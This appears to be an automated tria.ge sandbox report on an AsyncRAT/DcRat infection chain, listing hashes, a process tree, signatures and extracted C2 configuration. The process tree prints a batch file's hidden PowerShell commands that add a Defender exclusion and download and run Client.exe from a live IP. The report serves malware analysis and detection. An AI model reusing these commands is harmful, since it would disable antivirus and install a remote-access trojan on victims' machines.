Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

24/08/2024, 19:10

240824-xvmgnsvarc 10

24/08/2024, 18:56

240824-xlh3wstfpb 4

23/08/2024, 11:21

240823-nf4mza1bqc 4

23/08/2024, 11:13

240823-nbkz3azhrc 10

23/08/2024, 11:10

240823-m9qsjashrq 4

22/08/2024, 07:12

240822-h1kgyaxfpj 1

22/08/2024, 07:06

240822-hxesaaxenm 10

22/08/2024, 07:00

240822-hs54nsxdln 10

22/08/2024, 06:36

240822-hc93patara 8

22/08/2024, 06:32

240822-ha293awfnl 1

Analysis

  • max time kernel
    128s
  • max time network
    135s
  • platform
    windows10-1703_x64
  • resource
    win10-20240611-en
  • resource tags

    arch:x64arch:x86image:win10-20240611-enlocale:en-usos:windows10-1703-x64system
  • submitted
    22/08/2024, 07:06

General

  • Target

    http45.151.62.96setup.exe.txt

  • Size

    29B

  • MD5

    688fe12c2f39d3d739a04e6c89b1b22f

  • SHA1

    e2ea25ad47861e77b912026839666d3a99f5c90b

  • SHA256

    35e4cca77e38bd9beaf4a33c97a6f2464ca5ff63bbcf59831bd829b4683fda3c

  • SHA512

    f56694118d4adee2e0c65fb28c3ef86bc5db032656e2306e02e0f5b19706e260f0505ee97f5068d07ae5149a410a15eccd3ebc758d216a5549d7dc0de52834ac

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://20.199.84.103/Client.exe

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

C2

127.0.0.1:1024

20.199.84.103:1024

Mutex

DcRatMutex_qwqdanchun

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Drops file in Windows directory 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 64 IoCs
  • NTFS ADS 1 IoCs
  • Opens file in notepad (likely ransom note) 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\NOTEPAD.EXE
    C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\http45.151.62.96setup.exe.txt
    1⤵
    • Opens file in notepad (likely ransom note)
    PID:1848
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
    1⤵
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:512
  • C:\Windows\system32\browser_broker.exe
    C:\Windows\system32\browser_broker.exe -Embedding
    1⤵
    • Modifies Internet Explorer settings
    • NTFS ADS
    PID:2588
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    1⤵
    • Modifies registry class
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4520
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    PID:5108
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    1⤵
    • Drops file in Windows directory
    • Modifies registry class
    PID:4136
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    1⤵
      PID:1844
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Drops file in Windows directory
      • Modifies registry class
      PID:2900
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      PID:4240
    • C:\Windows\System32\rundll32.exe
      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
      1⤵
        PID:3804
      • C:\Windows\System32\NOTEPAD.EXE
        "C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Downloads\sasa.bat
        1⤵
        • Opens file in notepad (likely ransom note)
        PID:4848
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\sasa.bat" "
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:1552
        • C:\Windows\system32\fsutil.exe
          fsutil dirty query C:
          2⤵
            PID:3704
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -w hidden -c Add-MpPreference -ExclusionPath "C:\Windows\Temp\"
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4840
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -w hidden -c "(New-Object System.Net.WebClient).DownloadFile('http://20.199.84.103/Client.exe', 'C:\Windows\Temp\Client.exe')"
            2⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:912
          • C:\Windows\Temp\Client.exe
            "C:\Windows\Temp\Client.exe"
            2⤵
            • Executes dropped EXE
            PID:2888

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          2KB

          MD5

          1cfe572f8a58e5c315192b2262b19389

          SHA1

          0ee01be5ceb2f4c1769d1461a33900abb85879ea

          SHA256

          a166e551d09fc5f77e4ede547e3dc521b71f4b5c07b93f16de2b0f976fed6751

          SHA512

          7820fe3c45dd79a37c31d4a5a03a167b254f0e2eb5b9acf374944ffbebc3e2c919d494cdfcbf7d4d9e8142dac21d1c0e1c7e56fbfe337e8336e5302d88bcaa2f

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\ZVQ9VIUB\edgecompatviewlist[1].xml

          Filesize

          74KB

          MD5

          d4fc49dc14f63895d997fa4940f24378

          SHA1

          3efb1437a7c5e46034147cbbc8db017c69d02c31

          SHA256

          853d2f4eb81c9fdcea2ee079f6faf98214b111b77cdf68709b38989d123890f1

          SHA512

          cc60d79b4afe5007634ac21dc4bc92081880be4c0d798a1735b63b27e936c02f399964f744dc73711987f01e8a1064b02a4867dd6cac27538e5fbe275cc61e0a

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          1871e81a113b83a238af3e27b0f07047

          SHA1

          d38cc4cb6f38a75f67a0ce2cbac83b5ba626a584

          SHA256

          2931b37679d0858f2a7247aa6474677a5afd229d4974f52f47b68544b7e0a37f

          SHA512

          767322d491d778f08acad586215a2d31178353e708fd09a3afe88be202be55545bc95651cd8f25719db364cadbe29fccea6e23e42bb7a960e084eca1576ec656

        • C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

          Filesize

          4KB

          MD5

          1bfe591a4fe3d91b03cdf26eaacd8f89

          SHA1

          719c37c320f518ac168c86723724891950911cea

          SHA256

          9cf94355051bf0f4a45724ca20d1cc02f76371b963ab7d1e38bd8997737b13d8

          SHA512

          02f88da4b610678c31664609bcfa9d61db8d0b0617649981af948f670f41a6207b4ec19fecce7385a24e0c609cbbf3f2b79a8acaf09a03c2c432cc4dce75e9db

        • C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\A0N0VYON\favicon[1].svg

          Filesize

          1KB

          MD5

          73f25ae8dcc07b881abff4df6a8a2910

          SHA1

          cbe1ecd153cdb69879d896f1a6bea787b2be603b

          SHA256

          b44325257d9d25a3009f97d54d698a1ed6171ec6771ed87448e8fee752f5fe9b

          SHA512

          f8489cf9deca83a6c314dc26e25a55de613e24b06b677eaa25648c25bb1222f3baae904e034b31a99e73c7de84d1eab8e19d796bfa826af9cd58dcba5e2a97fe

        • C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\A0N0VYON\suggestions[1].en-US

          Filesize

          17KB

          MD5

          5a34cb996293fde2cb7a4ac89587393a

          SHA1

          3c96c993500690d1a77873cd62bc639b3a10653f

          SHA256

          c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

          SHA512

          e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

        • C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\WR5NOY2I\android-icon-192x192[1].png

          Filesize

          10KB

          MD5

          6f8794c494348dc51f0a8ad1ac097920

          SHA1

          8f2e865b954eb33f972d9435428d0b6efd72d44a

          SHA256

          8ac4b49a270c08994d79529e594d213de516246c569abcc87ca5b5a15a526ed3

          SHA512

          7918f1ae65c6e3d15660580caa8bb43bc8770e5369f03d99f5a717dba45b990e9a7d0667fce0fc8f6bd59bd543584b9b92cc86137e652893c0d701ce32c0ce46

        • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\6I0W0DVL\blank[1].gif

          Filesize

          148B

          MD5

          19517fb39a31be6b8d7ccf53ad84908f

          SHA1

          ebbcfdc6acc99f7aac3bf7fe72bc55f07f03f7e9

          SHA256

          3cb0e54babf019703fe671a32fcc3947aab9079ec2871cf0f9639245cc12d878

          SHA512

          be752ff4c7aa3ab46fdbd93555a17e422e7c8b8661f40f899f51ec9393b510dcb2e66436a4f2c78a42af77dd95e01a3438c88cfaa3e0b02694c1912d5294ee16

        • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\H7XAVNBU\Z064RD0L.htm

          Filesize

          1KB

          MD5

          eb94232b52be156f3487b1bed0b363c7

          SHA1

          3e57511c1165a87f36f9e56535a4771586cd55de

          SHA256

          8585d329157e3d2678dcdf0e5ce44e5c807c6e1de19c2d7049b14b0cfdc07423

          SHA512

          0cb7a667e42efcca74427b25ea0460f236673dac5efae85823c98a32edac98eb4d234d2192ee9530663c46cac9a3a82d4962366e087a2085c9862e0090fb780d

        • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\H7XAVNBU\sasa[1].bat

          Filesize

          7KB

          MD5

          90c3dfd74d6ab4b7b98777930ab44a23

          SHA1

          7f536fa9c3972c4416e8620335e39f9e93092103

          SHA256

          6308f3eef2d45148c4544a0c31d5bb73f28dac4b6fcb854e003e2caa0c39d26f

          SHA512

          aab364913c7f3972a136d2cf9241e46adf275bf74cdaedd0697746b4d0244a517a832154ead9849c36d2cc710c80e2754cff1d2b5c845041f0b5e0d6fd115a92

        • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\H7XAVNBU\unknown[1].gif

          Filesize

          245B

          MD5

          088e8e238b79e9ea2b4371abb91b1fea

          SHA1

          dc1cdfa814046ea64609c438e1777f55ff3aa86c

          SHA256

          15f5fd53009f61c653aa23d91334f9d7fa2fbd325eab859b68d77a45bb6a78b8

          SHA512

          3fd0722505117d869f0dda1f61644c30582e2a5e449452c8037c6c9360b4a4b1f11a8b5b9439a72be1a717ffdff7ee30c512d26740f6d0048cbe3ced4553e042

        • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\KZ17AUGQ\binary[1].gif

          Filesize

          246B

          MD5

          96bd4beed88ff93356586485c13e5d89

          SHA1

          399c2bc3d5ec4fdb4c7a597afdf19eeb64cbdf2d

          SHA256

          8a31e7855292e0a8c66c67ff92ea660743006d47de9f012193cbd123a17ba79d

          SHA512

          069a292c7e5d2e8d76964e901f4922ae8948151c235436cf8abc67e84011f983cd052142381b8d3c7a417f42b06797a6a226da48155d5905e7d92c9847b346cd

        • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\TVDOCEEK\text[1].gif

          Filesize

          229B

          MD5

          840e8b62bc6fd841c93d3af73bda9c40

          SHA1

          08ee70b4f29d27c84b7ab55c96b71c640a1e8163

          SHA256

          661d43fb30151a050da3b5cef49a2c7d0b01eeafdf1f4a001873406658b0f776

          SHA512

          6735b3ff8b6f8f174297449267f5f2480d0d5fa715fb8c412c18c1b51000c7f84e14594b97db260f20b81e785cb1ca718b52de7281dff711cb8803d802238ceb

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cdwdxfwq.ktl.ps1

          Filesize

          1B

          MD5

          c4ca4238a0b923820dcc509a6f75849b

          SHA1

          356a192b7913b04c54574d18c28d46e6395428ab

          SHA256

          6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

          SHA512

          4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

        • C:\Windows\Temp\Client.exe

          Filesize

          47KB

          MD5

          fedb1274930bfa08a83480134a3f1412

          SHA1

          d47be6340ecd780274b98dad463749eb2d9d49fd

          SHA256

          a8fcd268b48c903e21500439d6754500d59d12d7d5d4e2c7ea737661fa8fe230

          SHA512

          ba1d2a9745b837c1f984577a5d96bff1b2c126d86fd75c7e763b085ea8440360899d383be10a7a6f31bbd87c215c3dfed82c03c15880e8f4ef336c411cb448b4

        • memory/512-35-0x000002430E100000-0x000002430E102000-memory.dmp

          Filesize

          8KB

        • memory/512-16-0x000002430F120000-0x000002430F130000-memory.dmp

          Filesize

          64KB

        • memory/512-0-0x000002430F020000-0x000002430F030000-memory.dmp

          Filesize

          64KB

        • memory/2888-1251-0x00000000001A0000-0x00000000001B2000-memory.dmp

          Filesize

          72KB

        • memory/2900-211-0x0000014303200000-0x0000014303300000-memory.dmp

          Filesize

          1024KB

        • memory/2900-354-0x0000014B6D930000-0x0000014B6D940000-memory.dmp

          Filesize

          64KB

        • memory/2900-214-0x0000014302180000-0x00000143021A0000-memory.dmp

          Filesize

          128KB

        • memory/2900-207-0x0000014302160000-0x0000014302180000-memory.dmp

          Filesize

          128KB

        • memory/2900-150-0x0000014302CA0000-0x0000014302CC0000-memory.dmp

          Filesize

          128KB

        • memory/2900-106-0x0000014301BF0000-0x0000014301BF2000-memory.dmp

          Filesize

          8KB

        • memory/2900-104-0x00000143016E0000-0x00000143016E2000-memory.dmp

          Filesize

          8KB

        • memory/2900-102-0x00000143016D0000-0x00000143016D2000-memory.dmp

          Filesize

          8KB

        • memory/2900-71-0x0000014B6E300000-0x0000014B6E400000-memory.dmp

          Filesize

          1024KB

        • memory/4136-56-0x000001AEE7290000-0x000001AEE7292000-memory.dmp

          Filesize

          8KB

        • memory/4136-59-0x000001AEE72C0000-0x000001AEE72C2000-memory.dmp

          Filesize

          8KB

        • memory/4136-63-0x000001AEE7400000-0x000001AEE7402000-memory.dmp

          Filesize

          8KB

        • memory/4136-65-0x000001AEE7420000-0x000001AEE7422000-memory.dmp

          Filesize

          8KB

        • memory/4136-67-0x000001AEE7440000-0x000001AEE7442000-memory.dmp

          Filesize

          8KB

        • memory/4136-61-0x000001AEE72E0000-0x000001AEE72E2000-memory.dmp

          Filesize

          8KB

        • memory/4136-49-0x000001AED6BC0000-0x000001AED6CC0000-memory.dmp

          Filesize

          1024KB

        • memory/4840-1192-0x00000132F4EE0000-0x00000132F4F02000-memory.dmp

          Filesize

          136KB

        • memory/4840-1197-0x00000132F5090000-0x00000132F5106000-memory.dmp

          Filesize

          472KB

        • memory/5108-45-0x0000020E81F40000-0x0000020E82040000-memory.dmp

          Filesize

          1024KB